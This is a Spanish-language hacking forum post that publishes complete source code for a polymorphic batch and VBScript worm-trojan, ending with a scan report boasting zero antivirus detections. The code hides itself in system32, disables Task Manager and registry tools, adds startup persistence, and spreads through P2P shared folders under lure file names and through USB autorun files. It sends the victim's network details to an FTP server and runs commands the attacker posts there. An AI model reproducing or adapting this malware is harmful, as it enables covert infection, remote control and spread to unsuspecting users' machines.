[Troyano Parasitario] 1l1l3l5.a

Bueno, como sabeis, Batch No tiene Limites!!

Ejecutando comandos remotamente:

El troyano al infectar una maquina envia al servidor FTP un archivo del formato:
%username%at%userdomain%_ipcfg.t
conteniendo la salida del comando 'ipconfig/all'.
Para ejecutar un comando el esa PC basta con crear un archivo del formato:
%username%at%userdomain%_cmd.t
conteniendo el/los comandos a ejecutar, si se ejecuto correctamente, el archivo "%username%at%userdomain%_cmd.t" sera eliminado automaticamente del servidor.


:: 1l1l3l5.a // lil %ini%
:: Autor: lShadowl %ini%
:: SO Objetivo/Target OS: Windows Xp Pro %ini%
:: Propagation: P2P/rar, flash drives (it stay resident looking for new drives to infect) %ini%
:: Propagacion: P2P/rar, flash drives (queda residente en la memoria esperando que nuevos dispositivos se conecten para infectarlos) %ini%
:: Polimorfism: translocation, string morphing, 90-180 bytes added per every run %ini%
:: Polimorfismo: translocacion de codigo, mutacion de cadenas, 90-180 bytes mas cada ves que es ejecutado %ini%
:: Payload: Drops a FTP troyan that allows attacker to execute remote commands and scripts %ini%
:: Payload: Carga un troyano que le permite al atacante ejecutar comandos y scripts de manera remota via FTP %ini%
:: Fecha de creacion/Realese Date: 24/9/09 %ini%
:: Disclaimer: %ini%
:: This script contains malicious code. %ini%
:: Possessing, using, spreading, compiling and linking it, possessing, using and spreading %ini%
:: of the executable form of this script is illegal and it is forbidden in many countries. %ini%
:: Should you do such a thing, the author may not be held responsible for any damage that %ini%
:: occurred from the use of this source code. The actual purpose of this source code is for %ini%
:: educational purposes and as an object of study. This source code comes as is and the author %ini%
:: can not be held responsible for the existence of other modified variants of this code. %ini%
@%systemdrive% %ini%
@set sdjf=fictsoehnda %ini%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%
@%agnvl%mys=%windir%\system32\sysio\lil.bat %ini%
@%egnkv%off %ini%
%agnvl: =%local enabledelayedexpansion %ini%
@md %windir%\system32\sysio >nul %ini%
if not exist %mys% ( @copy /y %0 %mys% >nul %ini%
attrib +h %mys%) %ini%
call:_%1 %2 %ini%
exit %ini%
:_ %ini%
call:_h432crt perp %ini%
exit %ini%
:_mut %ini%
%fsdhf%"ini"<%mys%>%windir%\system32\sysio\$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%fsdhf%"m%r: =%"<%windir%\system32\sysio\$>nul&&(goto:tst) %ini%
%fsdhf%"m%r: =%"<%mys%>>%windir%\system32\sysio\$ %ini%
%agnvl%/a rdnmm=%random%*9999999 %ini%
%egnkv%::%rdnmm% %%m%r: =%%%>>%windir%\system32\sysio\$ %ini%
:tst %ini%
%agnvl%a=1 %ini%
for /L %%a in (0,1,9) do call:cmp %%a %ini%
%egnkv%%a%|%fsdhf: =%str /C:"o" >nul&&(goto:rnd_b) %ini%
attrib -h %mys% %ini%
type %windir%\system32\sysio\$>%mys% %ini%
ping -n 2 localhost>nul %ini%
attrib +h %mys% %ini%
del /f /q %windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%dfjalds=createobject("scripting.filesystemobject")>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%kdflekj=dfjalds.opentextfile("%mys%",1)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%askdajs=kdflekj.readall>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%kdflekj.close>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%Randomize>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%ahqiaohe=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%jdfasuu=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%dwudhqw=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%asdwdkw=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%sjdfhjs=Replace(askdajs,"sdjf",ahqiaohe)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%lasdaod=Replace(sjdfhjs,"agnvl",jdfasuu)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%skdnmxi=Replace(lasdaod,"egnkv",dwudhqw)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%sjsabwu=Replace(skdnmxi,"fsdhf",asdwdkw)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%skdjawuj=dfjalds.opentextfile("%mys%",2)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%skdjawuj.write sjsabwu>>%windir%\system32\sysio\asjdhau.vbs %ini%
start %windir%\system32\sysio\asjdhau.vbs %ini%
del /f /q %windir%\system32\sysio\h432.vbs,%windir%\system32\sysio\$&& exit %ini%
:_h432crt %m5%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL")>%windir%\system32\sysio\h432.vbs %m5%
%egnkv%xect.run "cmd /c %mys%%1", vbhide>>%windir%\system32\sysio\h432.vbs&& start %windir%\system32\sysio\h432.vbs&& goto :eof %m5%
:cmp %m7%
%fsdhf%"m%1"<%windir%\system32\sysio\$>nul %m7%
if %errorlevel%==1 (%agnvl% a=%a%o %m7%
goto:eof) %m7%
%agnvl% a=%a%x %m7%
goto :EOF %m7%
:rnd %m6%
%agnvl%/a r=%random%%%10 %m6%
goto:eof %m6%
:_perp %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntV%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\%sdjf:~6,1%xplor%sdjf:~6,1%r" /v NoFol%sdjf:~9,1%%sdjf:~6,1%rOptions /t R%sdjf:~6,1%G_%sdjf:~9,1%WOR%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntv%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\Syst%sdjf:~6,1%m" /v %sdjf:~9,1%is%sdjf:~10,1%bl%sdjf:~6,1%T%sdjf:~10,1%skMgr /t r%sdjf:~6,1%g_%sdjf:~9,1%wor%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntV%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\Syst%sdjf:~6,1%m" /v %sdjf:~9,1%is%sdjf:~10,1%bl%sdjf:~6,1%R%sdjf:~6,1%gistryTools /t r%sdjf:~6,1%g_%sdjf:~9,1%wor%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v lilUpdate /t REG_SZ /d %mys%/f %m1%
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AvUpdate /t REG_SZ /d %windir%\system32\sysio\h42.vbs /f %m1%
del /q %windir%\system32\sysio\t.rar %m1%
%systemdrive%&& set rc=1 %m1%
if exist "%programfiles%\WINRAR\WinRAR.exe" (set r="%programfiles%\WINRAR\WinRAR.exe" %m1%
%r% a -ibck -y %windir%\system32\sysio\t.rar %mys: =% %m1%
if not %errorlevel%==9009 set rc=0) %m1%
for %%a in ("%userprofile%\Configuraci¢n local\Datos de programa\Ares\My Shared Folder\" "%userprofile%\Local Settings\Application Data\Ares\My Shared Folder\" "%programfiles%\eMule\Incoming\" "%programfiles%\Shareaza\Downloads\" "%programfiles%\BearShare\Shared\" "%programfiles%\LimeWire\Shared\") do (if exist "%%a" (cd "%%a" %m1%
for %%e in (*.rar) do (type !mys: =!>"%%~ne.bat" %m1%
ping -n 2 localhost >nul&& !r! a -ibck -y "%%e" "%%~ne.bat") %m1%
for %%g in ("XXX Photos" dvdrip glee "Keygen Constructor" wii psp "Keygen ALL" fringe surrogates "Nude Celebrities" "MSN hack codes" "Password list" "Activation tool" Windows7 "Windows 7 trucos" "Windows 7 tricks" "MSN Hack Tool" Photoshop "Photoshop CS4") do (type !mys: =!>%%g.bat %m1%
if !rc!==0 (ping -n 2 localhost>nul&& !r! a -ibck -y %%g.rar %%g.bat)))) %m1%
call:_h432crt fnid&& ping -n 12 localhost>nul %m1%
call:_h432crt dinfres&& ping -n 12 localhost>nul&& set ertr=9 %m1%
%fsdhf%"m%ertr: =%"<%mys%>%windir%\system32\sysio\fet.bat %m1%
ping -n 1 www.google.com>nul&&(if not exist %username%at%userdomain%_cmd.t ( %m1%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL"^)>%windir%\system32\sysio\h42.vbs %m1%
%egnkv%xect.run "cmd /c %windir%\system32\sysio\fet.bat", vbhide>>%windir%\system32\sysio\h42.vbs %m1%
%windir%\system32\sysio\h42.vbs)) %m1%
call:_h432crt mut&& exit %m1%
:_dinfres %m2%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL")>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%%agnvl%kjslras=GetObject("winmgmts:\\.\root\cimv2").ExecNotificationQuery _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%("Select*From __InstanceOperationEvent Within 10 Where " _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%^& "TargetInstance isa 'Win32_LogicalDisk'")>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Do While True>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%%agnvl%asdaiw=kjslras.NextEvent>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%If asdaiw.TargetInstance.DriveType=2 _>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Or asdaiw.TargetInstance.DriveType=3 Then>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Select Case asdaiw.Path_.Class>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Case "__InstanceCreationEvent">>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%wscript.sleep 2000>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%xect.run "cmd /c %mys%ddetc " ^& asdaiw.TargetInstance.DeviceId ^& " 1", vbhide>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%End Select>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%End If>>%windir%\system32\sysio\ubsh.vbs %m2%
%egnkv%Loop>>%windir%\system32\sysio\ubsh.vbs %m2%
taskkill /f /im wscript.exe %m2%
start %windir%\system32\sysio\ubsh.vbs&& goto :eof %m2%
:_fnid %m4%
for %%i in (C: H: I: J: K: L: M: Z: Y: X: W: V: U: T: S: R: Q: P: O: N: G: F: E: D:) do (call:_ddetc %%i) %m4%
exit %m4%
:_ddetc %m4%
if exist %1 (fsutil fsinfo drivetype %1|findstr /C:"CD" >nul&& (>nul echo.)|| (if exist %1\%sdjf:~10,1%utorun.inf ( %m4%
for %%z in ("%1\%sdjf:~10,1%utorun.inf" "%1\lil.bat") do (%sdjf:~10,1%ttrib -h -r -s -a "%%z") %m4%
ren %1\%sdjf:~10,1%utorun.inf %random%ow.ned) %m4%
echo.exit|cmd/K prompt $_[%sdjf:~10,1%utorun]$_open=lil.bat$_shellexecute=lil.bat$_; >"%1\%sdjf:~10,1%utorun.inf" %m4%
type "%mys: =%">"%1\lil.bat" %m4%
for %%z in (%1\%sdjf:~10,1%utorun.inf %1\lil.bat %1\*.ned) do (%sdjf:~10,1%ttrib +h "%%z"))) %m4%
if %2'==' (goto:eof) else (exit) %m4%
@%systemdrive% %m9%
@set sdjf=fictsoehnda %m9%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %m9%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %m9%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %m9%
%agnvl: =%local enabledelayedexpansion %m9%
cd %windir%\system32\sysio %m9%
%agnvl%"target=%windir%\system32\sysio\" %m9%
ipconfig/all>%username%at%userdomain%_ipcfg.t %m9%
%egnkv: =%.exit|cmd/K prompt $_verbose$_open FTP.SERVER$_FTP.USER$_FTP.PASS$_cd FTP.TARGET.FOLDER$_verbose >$.t %m9%
%egnkv: =%.>mello.t&& call:r $.t exit ipcfgs.t %m9%
%egnkv: =%.exit|cmd/K prompt $_lcd "%target%"$_put %username%at%userdomain%_ipcfg.t$_ls -lF$_verbose$_quit$_rem >>ipcfgs.t %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:ipcfgs.t %m9%
%egnkv: =%.>mello.t&& call:r $.t exit mello.t %m9%
%egnkv: =%.exit|cmd/K prompt $_lcd "%target%"$_get %username%at%userdomain%_cmd.t$_ls -lF$_verbose$_quit$_rem >>mello.t %m9%
:floop %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:mello.t %m9%
if exist %username%at%userdomain%_cmd.t for /f "delims=" %%a in (%username%at%userdomain%_cmd.t) do (%agnvl%"rcmd=%%a" %m9%
if defined rcmd (cmd /c !rcmd! %m9%
if !errorlevel!==0 (%egnkv: =%.>"d.t"&& call:r $ exit "d.t" %m9%
%egnkv: =%.exit|cmd/K prompt $_delete !username!at!userdomain!_cmd.t$_ls -lF$_verbose$_quit$_rem >>"d.t" %m9%
taskkill /f /im ftp.exe %m9%
ftp -s:"d.t">nul&& del /q !username!at!userdomain!_cmd.t))) %m9%
goto:floop %m9%
:r %m9%
for /f "tokens=1,* delims=]" %%A in ('"type %1|find /n /v """') do (%agnvl%"current=%%B" %m9%
if defined current (call %agnvl%current=!!current:%2=!!&& %egnkv%!current!>>%3) else %egnkv: =%.>>%3) %m9%
goto:eof %m9%
:: %m0%
:: %m8%

Debido a posibles problemas al postear he subido el archivo en formato .txt a 1l1l3l5.a.txt



File Info

Report generated: 28.9.2009 at 19.25.46 (GMT 1)
Filename: 1l1l3l5.a.txt
File size: 11 KB
MD5 Hash: 7ab39a5929fa5dd09b38be6bd249fd4e
SHA1 Hash: 4492A228C7D2732DCACE25B2B73F3C6EEDC896CC
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 23

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org


;D
